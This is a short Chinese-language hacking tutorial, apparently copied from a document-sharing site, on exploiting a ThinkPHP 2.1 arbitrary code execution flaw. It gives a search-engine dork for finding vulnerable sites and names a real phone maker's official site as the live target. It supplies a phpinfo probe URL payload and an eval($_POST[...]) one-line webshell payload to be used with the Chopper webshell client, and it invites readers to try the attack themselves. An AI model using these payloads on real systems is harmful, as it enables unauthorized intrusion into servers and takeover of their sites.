Thinkphp框架任意代码执行漏洞利用实战
Thinkphp框架任意代码执行漏洞利用实战
嗨我来了
不错我就是传说中的无敌美少男“疯子”大人是耶。
哈哈,开个玩笑
文章+截图大家都喜欢看漫画所以呵呵我YD了
开始吧
谷歌搜索关键字:intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }
实战网站:天语手机官网(https://www.360docs.net/doc/ce1680633.html,/)
天语这个手机品牌你们是知道的你们也懂的
查看漏洞是否修复,https://www.360docs.net/doc/ce1680633.html,/index.php/module/aciton/param1/${@phpinfo()}
网站后面添加 index.php/module/aciton/param1/${@phpinfo()}
那样就会出来服务器的系统配置信息等
然后查看到存在这个漏洞
我们就上一句话然后菜刀连接
https://www.360docs.net/doc/ce1680633.html,/index.php/module/action/param1/{${eval($_POST[mad])}}
index.php/module/action/param1/{${eval($_POST[mad])}}
出现这个然后就表示成功了如果是404 就表示已经修复了
然后我们利用菜刀
这样配置
然后就成功了
利用这个漏洞就是那么简单你们也尝试一下吧骚年们BY:疯子
相关主题